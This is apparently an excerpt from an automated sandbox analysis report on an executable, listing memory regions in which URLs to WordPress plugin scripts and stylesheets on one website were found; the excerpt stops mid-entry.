              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/js/scripts.js?ver=2.3.9
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.9
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.7.7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/custom.css?ver=6
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/custom.js?ver=1.6
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/imagesloaded.pkgd
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/jquery.qtip.js?ve
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 